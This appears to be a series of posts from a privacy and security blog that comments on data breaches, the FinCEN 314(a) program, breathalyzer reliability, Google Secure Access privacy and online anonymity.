Harper’s Privacy Framework for DHS

Jim Harper writes:

At this week’s meeting of the Department of Homeland Security’s Data
Privacy and Integrity Advisory Committee, Joanne McNabb, Chief of the
California Office of Privacy Protection, and I circulated and
presented a draft ‘Framework’ for assessing homeland security
programs in terms of their consequences for privacy and related values.

Members of the Committee will be reviewing it and ?test-driving? it
in their respective work and studies of DHS programs and technologies.

Public comment on the draft would also be welcome, addressed to


I’ve skimmed it, it looks really interesting. Wish I had more time to think about it deeply. From Politech, via IP.

Fishermen’s Friend, Breathalyzers

It comes after a 24-year-old driver was found to be over the legal drink-drive limit during a routine control in Munich. He was taken to the police station where blood tests found he had no alcohol in his system. The man was released after officers found the strongest thing he had taken was a Fisherman’s Friend.

Forensic doctor Thomas Gilg said the essential oils contained in the throat sweets reacted in the same way as alcohol on hand-held breathalysers. He said in tests they found just three of the mentholated sweets could cause a motorist to test three times over the legal limit.

My first question is, is this for real? Turns out there is a Prof. Dr.med. Dr.med.habil. Thomas Gilg at a medical school in Munich. I can’t find a paper or abstract, but I can see that T. Gilg publishes on forensic analysis. Good enough for now.

My second question relates to the breathalyzer, and its scientific validity. As Schneier pointed out in “DUI Cases Thrown Out Due to Closed-Source Breathalyzer,” the people who make these things don’t like to talk about how they work. If we don’t know how they work, how can we assign guilt on the basis of what it says? (Me, I think everyone with halitosis is guilty.) Is the breathalyzer the next polygraph — beloved of the CIA, but with no validity under Daubert?

From Ananova, “Sucking a Fishermen’s Friend could get you into trouble,” via Blondesense, via Sivacracy.

“Remains Safely Anonymous”

People seem to dig Star Wars posts. I could probably blog for a month on security lessons, illustrated with Star Wars quotes, but I’d need to buy the DVDs and get some video capture technology, and …


…ok. You’ve convinced me. Friday Star-Wars-security-lessons-blogging it is.

Ben: The “other” he spoke of is your twin sister.

Luke : But I have no sister.

Ben: Hmm. To protect you both from the Emperor,
you were hidden from your father when you
were born. The Emperor knew, as I did, if
Anakin were to have any offspring, they would
be a threat to him. That is the reason why
your sister remains safely anonymous.

That’s right. Keep listening to the crazy old hermit, he knows security: Anonymity protects children from those who would do them harm. If you can’t find the child, you can’t turn them to the dark side.

Be sure to tune in next Friday, when Admiral Piett’s actions illustrate Kerkhoff’s principle.

Bugger Productivity

It’s not like I was getting any work done anyway. (Ok, actually I was: Five of yesterday’s six posts took under 10 minutes, and four took 5 minutes or less.) But:

  • Scientists invade the privacy of Giant squid, intruding on their long-preserved solitude. Also be sure to notice National Geographic’s beautiful user interface for selecting photographs.
  • Ray Everett-Church has the right comments on the sad passing of Don Adams, in “Owner of World’s First Mobile Phone Dies.”
  • EPIC has good commentary on “Mass. Grocer to Market to Customers’ Wireless Phones,” including why this is more invasive than other “loyalty card” programs, and why they’re fooling you with the promise of lower prices.
  • The Wall St Journal has an article on the mash being made of the Do-Not-Call list, “Do-Not-Call Lists Under Fire.” It’s enough to make you think that the forthcoming data protection law shouldn’t have any state preemption. (Thanks to Rob for the pointer.)
  • And lastly, Republican Congressmen are questioning if the Pentagon is trying to evade oversight, as the New York Times reports in “Republicans See Signs That Pentagon Is Evading Oversight.”

University of Georgia, 2400 SSNs, Hacker

ATHENS – A hacker broke into a computer database at the University of
Georgia, gaining access to the Social Security numbers of employees in
the College of Agricultural and Environmental Sciences and people who
are paid from that department.

More than 2,400 numbers, belonging to roughly 1,600 people, may have
been exposed, UGA spokesman Tom Jackson said Wednesday.

The names and numbers were not connected on the documents, Jackson
said, but an experienced hacker could be able to interpret the data
well enough to match them.

I don’t understand how 1,600 people have 2,400 social security numbers unless one of them worked for RBC Dain Rauscher.

From the Atlanta Journal Consitution, “Computer breach reported at UGA,” via InfoSec News.

FinCEN Effectiveness

At the Counter-Terror blog, Andrew Cochran writes: “Treasury Department’s FinCEN Unit Recovering From “Cyberjacked” E-Mail System:”

The most important impact of the cyberjacking has been to shut down the automated system whereby FinCEN and law enforcement request and receive information from financial institutions for use in terrorism and money laundering cases.

The system, enacted under section 314(a) of the PATRIOT Act, took several years and numerous hiccups to implement, but it’s operated quite smoothly for over a year. Starting in March, FinCEN posted 314(a) requests for information on a secure website for review and response by over 24,000 financial institutions. FinCEN periodically issues results of the 314(a) requests, with the most recent out on September 13 (I had posted discussions of 314(a) request reports earlier this year here and here). According to this report, the requests for information issued since the 314(a) request system began in February 2003 have resulted 157 cases involving terrorism or terrorist financing and 272 cases involving money laundering. The results of the cases thus far are, quoting from the September 13 report:

1091 Grand Jury Subpoenas
13 Search Warrants
154 Administrative Subpoenas/Summons/Other
77 Arrests
72 Indictments
10 Convictions

$14,405,053.64 Total Dollar Amount Located

In my opinion, that’s a good track record which merits a ‘congrats’ to FinCEN, law enforcement, and the participating financial institutions. Although there was no compromise in the 314(a) system itself, FinCEN was wise to shut it down while they run security tests. They plan to transmit 314(a) requests in another manner until they can restore the automated system.

That’s a good track record? 24,000 institutions all reviewing these requests for ten convictions? (And is that a normal ratio of 1258 subponeas/warrants/etc to 77 arrests?) No wonder our credit card fees are going up. Note especially the FDIC’s instruction:

SISS can only be accessed by the financial institution’s designated Section 314(a) points of contact. If you use a third-party vendor or product to conduct searches, your institution is still required to log on and review the information on the SISS. (Emphasis mine.)

As Cochran’s co-blogger Victor Comras pointed out, “these rules have turned out to be a much more controversial matter than originally envisaged, and have provoked the ire of banking managers across the country.” 24,000 institutions required to review an endless stream of requests to find, well, on first glance, it’s to find enough money to fund 28 September 11th scale attacks. Or perhaps, since roughly 2/3ds of the cases are “money laundering” not terrorism related, it’s enough “terrorist money” to fund 9 attacks. But its not broken down by investigation type, so its hard to say what fraction should be attributed to “terrorist financing.” Maybe they’ve seized some Convent’s savings account, much like they’ve put nuns on the no-fly list? I just don’t understand how this can be seen as a good return on investigative effort.

What About My Needs?

While everyone (FCC, FBI, RIAA) is lining up to decide what software you can run, I’d just like to ask that I be included in the list.

The Federal Communications Commission thinks you have the right to use software on your computer only if the FBI approves.

No, really. In an obscure “policy” document released around 9 p.m. ET last Friday, the FCC announced this remarkable decision.

According to the three-page document, to preserve the openness that characterizes today’s Internet, “consumers are entitled to run applications and use services of their choice, subject to the needs of law enforcement.” Read the last seven words again.

Actually, no. I’d like to decide what software I run, subject to my needs. Thank you. (From “FBI to get veto power over PC software?“)

RBC Dain Rauscher, 300,000 SSNs, Disgruntled former employee


The FBI has opened an investigation into the possible theft of personal information about some clients of RBC Dain Rauscher Inc.

The chief executive of the Minneapolis-based brokerage firm disclosed the problem in a letter sent to 300,000 households. Dain Rauscher has not yet detected any fraudulent activity in their accounts, according to the letter from Dain head John Taft.

“While we have no information to believe that your personal information has been compromised in any way, we are treating this as a serious situation,” Taft wrote.
FBI agent Paul McCabe said the agency does not know how many accounts might be affected.

(Yeah, I don’t have “no information to believe” neither. But I do have reason to believe that information about these people have been compromised.)

Dan Callahan, a Dain Rauscher spokesman, said some clients have received anonymous letters sent last week by someone claiming to be a former Dain employee. The letter, received by a seemingly random group of more than 100 account holders, contained each recipient’s name, address, tax identification number, birthdate and Dain Rauscher account number.

You mean social security number, don’t you?

The Star Tribune obtained a copy of the profanity-laced letter, whose author said he was seeking revenge on Dain Rauscher because the company fired him.

The writer claims to have been able to copy information from “thousands” of accounts because Dain Rauscher did not remove his password from a mainframe computer. He claims to have sold the information to an unidentified buyer.

and finally, the company takes a cunning move from the Choicepoint playbook, putting their own victimhood ahead of that of their customers:

“We are a victim, just like our clients,” Callahan said. “We take their protection very seriously.”

Hint to Dain Rauscher: I referenced Larry Ponemon’s “After a privacy breach, how should you break the news?” months ago. It has some useful advice.

Quotes are from “FBI checking theft of Dain clients’ data,” via InfoSecurity News.

CUNY, Hundreds of SSNs, Exposed Files

The CUNY foul-up that put students’ personal information a Google search away from identity thieves was more widespread than first reported, with school officials saying yesterday that the Social Security numbers of hundreds of employees also got on the Web.

City University of New York officials detected the unprotected payroll link for Hunter College Campus Schools this past Wednesday after a law student tipped them about search engine links to CUNY files.

Delayed response

But while 335 Queens College law students got alerts on the breach Thursday, CUNY waited until Friday to e-mail memos on the Hunter problem that involved 265 workers and 171 former workers and retirees from the elementary and high schools, according to the Hunter memo and CUNY’s chronology.

From Newsday, “New CUNY security slip“, via Privacy.org.

More On Cardsystems Lawsuit

Joris Evers continues to report well on the Cardsystems lawsuit, this time in “Judge looks for links in credit card case:”

Kramer said he wants to be clear on which defendants fall under California civil code section 1798.82, the notification statute. While it is clear that the breach was at CardSystems, the law applies to entities that “own or license” personal information about Californians. Plaintiffs in the case say that includes Visa, MasterCard and Merrick.

“I believe we have to figure out whether indeed Visa, MasterCard and Merrick are covered by the statute. They don’t seem to own the data, but the plaintiffs’ view is that they are operating with a license,” Kramer said. He ordered all parties to prepare for a trial on that matter and to exchange information.

That makes it much clearer why this is not cut and dried. I previously mentioned the suit in “Cardsystems Breach and Notice.”

Google VPN, Macs, and Privacy

NudeCybot (hey, you’re blogging again!) asked me for opinions on Google Secure Access (or just GSA), and sent me a link to Kevin Stock’s Google Secure Access on Mac OS X. There’s a lot of critiques of Google’s Privacy policy around GSA: “Hide what you’re doing from everyone but us! And, umm, anyone who asks us real nice.” So lets look at exactly what Google sees.

One of the things Kevin shows is that by visiting https://vpn.google.com/getpass/, you’re given an IP address of a server, and a username and password. Now, that’s fascinating to me, because you can use a tool like Curl to download the access bits. And you can do so without a cookie. That’s important, because it drives a lack of linkage. You can even use Curl over tor/privoxy to get your data:
curl --proxy localhost:8118 https://vpn.google.com/getpass/
Add a -D and see that Google isn’t even setting a cookie on the connection.

So its not clear that Google knows who the users of GSA are. Unlike a lot of their services, it doesn’t require that you share your “Google name” with them. Google names include gmail, orkut, or often even your regular Google cookie. (Come on, whose name do you search on most?) But that’s not strong privacy, and it’s likely to break, when you login to a non-SSL site, or ego-search, or, umm, expose your cookies to them. It could break if you check email without encryption.

Jumping back to Kevin’s script, I found the Applescript solution both slow and also a bit worrying (an attacker pretending to be Google can feed stuff into that script). So I started writing a shell script to do much the same thing, with a few bits of code added for resilience against attackers. The only bit missing is exactly how to feed a password into the Mac’s command line pppd.

Some technical comments on Kevin’s scripts are after the break.

Continue reading

North Fork Bank, 9000 mortgageholders (Not SSNs), stolen laptop

Data relating to about 9,000 mortgages that were originated by Countrywide Home Loans but sold to North Fork were in the laptop, according to a letter received by a customer on Thursday. The laptop was one of several stolen over the July 24 weekend, the letter said without identifying the office. The data included the customer’s name, address and mortgage account number but, at least for that customer, not her Social Security number.

Newsday attempts to obtain comment from North Fork were unavailing. But a customer who called a number listed on the letter for more information was told an arrest had been made, although no details were given about where or when that arrest occurred.

From “North Fork sends out letters after a laptop containing data for about 9,000 mortgages was stolen,” courtesy of Chris Walsh.

What Is Phishing

In conversation with a friend, I realized that my essay, “Preserving the Internet Channel Against Phishers” didn’t actually explain the problem. I made the assumption that everyone had the same perception of what it was. (Why didn’t anyone point that out?) So I’ve added the following (after the break), and I think the resultant essay is much improved.

Continue reading

A Life, Observed

A blogger who I’d recently discovered has retired:

I’ve always had my two lives separated – my offline world and my online one. That’s the way I wanted it and that’s the way I set it up and I’ve got my own reasons for it. And someone decided to ruin all the fun and be a smug ass about it and go to incredibly great lengths to find out where I “live” online. And they managed to do it, and now they’re all snide about it.

(The blog and its archive have gone while I edited this post. Google isn’t showing a cache, and its gone from my cache. The longest excerpt I can find is on PSoTD.)

I’m sad, but I respect her decision. I tried blogging anonymously for a while. It was tough to get attention. I made a conscious choice to tie this blog to the same name I use in the security industry.

Soj made a conscious decision to use a nickname. The ability to explore ways of thinking without having to commit to them or answer for them is important. And privacy is what allows that. If (for example) security expert Bruce Schneier wanted to re-evaluate the case for national ID cards, he would probably not use his blog for that. He might want words he writes or says as he explores an idea to be private.

As we move to a society where we’re recorded in public, in taxis, in subways, restaurants, or in our homes, our ability enjoy the benefits of privacy disappears. (Think home cameras just spy on the nanny? Think again.)

Some people will definitely feel safer as their lives are recorded. The rest of us will be all the poorer for not having Soj Flog the Simian anymore, or thousands of other projects, which, chilled, never see the light of day.

(Thanks are due a number of folks for suggesting links for that last paragraph, especially R for mentioning Banksy.)